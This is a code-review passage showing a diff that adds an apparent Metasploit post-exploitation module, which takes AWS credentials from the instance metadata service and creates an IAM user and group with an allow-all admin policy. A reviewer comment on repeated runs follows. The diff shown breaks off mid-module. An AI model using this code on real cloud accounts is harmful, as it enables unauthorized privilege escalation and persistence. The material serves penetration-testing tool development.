modules/post/multi/escalate/aws_create_iam_user.rb

```diff
@@ -0,0 +1,94 @@
+require 'msf/core'
+require 'metasploit/framework/aws/client'
+
+class MetasploitModule < Msf::Post
+
+  include Metasploit::Framework::Aws::Client
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Create an AWS IAM User",
+      'Description'    => %q{
+        This module will attempt to create an AWS (Amazon Web Services) IAM
+        (Identity and Access Management) user with Admin privileges.
+      },
+      'License'        => MSF_LICENSE,
+      'Platform'      => %w(unix),
+      'SessionTypes'  => %w(shell meterpreter),
+      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>']
+    ))
+
+    register_options(
+      [
+        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
+        OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
+        OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
+        OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
+        OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
+        OptString.new('IAM_USERNAME', [true, 'Username for the user to be created', 'metasploit']),
+        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
+      ])
+    register_advanced_options(
+      [
+        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
+        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
+        OptString.new('Token', [false, 'AWS session token', ''])
+      ])
+    deregister_options('VHOST')
+  end
+
+
+  def run
+    # setup creds for making IAM API calls
+    creds = metadata_creds
+    if datastore['AccessKeyId'].empty?
+      if creds['AccessKeyId'].nil?
+        print_error("Clould not find creds")
+        return
+      end
+    else
+      creds = {
+        'AccessKeyId' => datastore['AccessKeyId'],
+        'SecretAccessKey' => datastore['SecretAccessKey'],
+        'Token' => datastore['Token']
+      }
+    end
+
+    # create user
+    username = datastore['IAM_USERNAME']
+    print_status("Creating user: #{username}")
+    action = 'CreateUser'
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
+    print_results(doc, action)
+
+    # create group
+    print_status("Creating group: #{username}")
```

Comment:
For ... I guess all of these calls, what happens if this module has been run in a similar way before and, for example, tries to create the same group again?  Might be a reason to randomize some of this by default.